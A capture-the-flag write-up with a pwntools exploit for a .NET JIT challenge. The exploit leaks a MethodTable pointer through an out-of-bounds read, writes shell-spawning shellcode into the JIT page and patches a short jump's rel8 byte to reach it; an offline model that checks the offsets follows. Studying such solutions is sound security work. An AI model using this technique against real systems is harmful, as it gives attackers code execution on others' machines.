Tags: jit dotnet pwn
Rating:
```python
"""
Pointer chain (addresses from one run; everything is ASLR'd):

00007fb352321288   - FastByteArray MethodTable (MT); the slot at MT - 32 ->
0x00007fb352321268 - part of another (unknown) MT, holds a pointer into the JIT page ->
0x00007fb3521a4fe0 - pointer into the JIT page (= target JIT address + 210) ->
0x7fb3521a4f0e     - target JIT address; the short jump patched below sits at +18

Steps:
- leak the FastByteArray MT pointer (OOB read past the end of an array)
- MT - 32 = slot holding a pointer into the JIT page
- read that slot
- pointer - 210 = target JIT address; +18 = the 2-byte short jump (jmp rel8)
  that runs for every read/write operation, i.e. pointer - 192
- write shellcode to a nearby unused part of the JIT page
- overwrite the short jump's rel8 offset byte so it lands on the shellcode
- trigger any read/write and get a shell
"""
from pwn import *

context(arch="amd64", os="linux")  # shellcraft.amd64.* and asm() need the right arch

# create(), read(), recv(), read_any(), write_any(), pause() and the tube `p`
# are the challenge-specific helpers defined earlier in the script (not shown here).
array_size = 100
pause()
# heap groom: allocate several arrays so a FastByteArray object ends up right after array 1
for _ in range(15):
    create(array_size)
# OOB read past the end of array 1: the 8 bytes at offset array_size + 76 are the
# neighbouring FastByteArray's MethodTable pointer
read(1, array_size + 76, 8)
fba_mt = u64(recv().ljust(8, b"\x00"))
pause()
# the slot 32 bytes below the MT holds a pointer into the JIT page currently in use
jit_addr = read_any(fba_mt - 32)
# 192 bytes (210 - 18) below that pointer is the 2-byte short jump (jmp rel8)
# executed on every read/write operation
target_addr = u64(jit_addr) - 192
print("short jump instruction at:", hex(target_addr))
pause()
shellcode = asm(shellcraft.amd64.linux.sh())
shellcode_addr = target_addr + 115  # I've stopped giving a fuck
write_any(shellcode_addr, shellcode, size=len(shellcode))
# patch the jump's rel8 byte: rel8 is relative to the end of the 2-byte jump, so
# 0x71 (113) + 2 = 115 bytes past the jump, i.e. exactly shellcode_addr
write_any(target_addr + 1, b"\x71", size=1)
p.interactive()
```
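The address arithmetic and the `jmp rel8` patch above, modelled offline so the constants can be checked before touching the real process. This is an added example, not part of the original writeup: it uses only the Python standard library, takes the offsets 32, 192 and 115 from the writeup's pointer chain, and works on a constructed fake JIT page (NOPs, a 2-byte short jump, and `int3` bytes standing in for the shellcode) rather than anything read from the target. `demo()`, `patch_jmp_to_shellcode()` and the other helper names are mine.

```python
import struct

# Offsets taken from the writeup's pointer chain: the slot holding the JIT-page
# pointer is 32 bytes below the FastByteArray MethodTable, and that pointer is
# 192 bytes (210 - 18) past the 2-byte short jump that runs on every read/write.
MT_TO_JIT_SLOT = 32
JIT_PTR_TO_JMP = 192
JMP_REL8 = 0xEB  # opcode of `jmp rel8`


def jit_slot_from_mt(fba_mt):
    """Address of the slot (inside the neighbouring MT) that points into the JIT page."""
    return fba_mt - MT_TO_JIT_SLOT


def jmp_addr_from_jit_ptr(jit_ptr):
    """Address of the short jump, given the pointer read from that slot."""
    return jit_ptr - JIT_PTR_TO_JMP


def short_jmp_rel8(jmp_addr, dest):
    """rel8 byte that makes the 2-byte jmp at jmp_addr land on dest.

    rel8 is relative to the instruction *after* the jump (jmp_addr + 2) and is
    a signed byte, so dest must lie within [-128, +127] of that point.
    """
    rel = dest - (jmp_addr + 2)
    if not -128 <= rel <= 127:
        raise ValueError("0x%x is out of jmp rel8 range from 0x%x" % (dest, jmp_addr))
    return rel & 0xFF


def short_jmp_dest(jmp_addr, insn):
    """Decode a 2-byte `EB rel8` fetched from jmp_addr and return where it goes."""
    if len(insn) != 2 or insn[0] != JMP_REL8:
        raise ValueError("not a jmp rel8: %r" % (bytes(insn),))
    return jmp_addr + 2 + struct.unpack("<b", insn[1:2])[0]


def patch_jmp_to_shellcode(page, page_base, jmp_addr, shellcode_addr, shellcode):
    """Apply the exploit's two writes to a constructed copy of the JIT page.

    page is a bytearray modelling the page mapped at page_base. Returns the
    address the patched jump now reaches (should equal shellcode_addr).
    """
    sc_off = shellcode_addr - page_base
    jmp_off = jmp_addr - page_base
    # the shellcode must not clobber the jump we are about to retarget
    if sc_off < jmp_off + 2 and sc_off + len(shellcode) > jmp_off:
        raise ValueError("shellcode overlaps the short jump")
    page[sc_off:sc_off + len(shellcode)] = shellcode               # write_any(shellcode_addr, ...)
    page[jmp_off + 1] = short_jmp_rel8(jmp_addr, shellcode_addr)   # write_any(target_addr + 1, ...)
    return short_jmp_dest(jmp_addr, page[jmp_off:jmp_off + 2])


def demo():
    # Constructed run using the addresses quoted in the writeup's docstring.
    fba_mt = 0x7FB352321288
    jit_ptr = 0x7FB3521A4FE0            # value sitting at jit_slot_from_mt(fba_mt)
    jmp_addr = jmp_addr_from_jit_ptr(jit_ptr)
    shellcode_addr = jmp_addr + 115

    # Fake 4 KiB JIT page (constructed; the real contents are whatever the JIT emitted),
    # with a 2-byte short jump at jmp_addr and int3 bytes standing in for the shellcode.
    page_base = jmp_addr & ~0xFFF
    page = bytearray(b"\x90" * 0x1000)
    page[jmp_addr - page_base:jmp_addr - page_base + 2] = bytes([JMP_REL8, 0x05])
    shellcode = b"\xCC" * 48

    landed = patch_jmp_to_shellcode(page, page_base, jmp_addr, shellcode_addr, shellcode)
    return jmp_addr, shellcode_addr, page[jmp_addr - page_base + 1], landed


if __name__ == "__main__":
    jmp, sc, rel8, landed = demo()
    print("jmp at 0x%x, shellcode at 0x%x, rel8 = 0x%02x, jump lands at 0x%x"
          % (jmp, sc, rel8, landed))
```

Running `demo()` reproduces the writeup's numbers: the jump is at `0x7fb3521a4f20`, the shellcode at `+115`, and the rel8 byte comes out as `0x71`, which is why the script writes `"\x71"` at `target_addr + 1`. The range check is the caveat the one-liner in the exploit hides: a `jmp rel8` can only reach 127 bytes forward, so a spot for the shellcode any further away would need a `jmp rel32` (5 bytes) and a correspondingly larger overwrite.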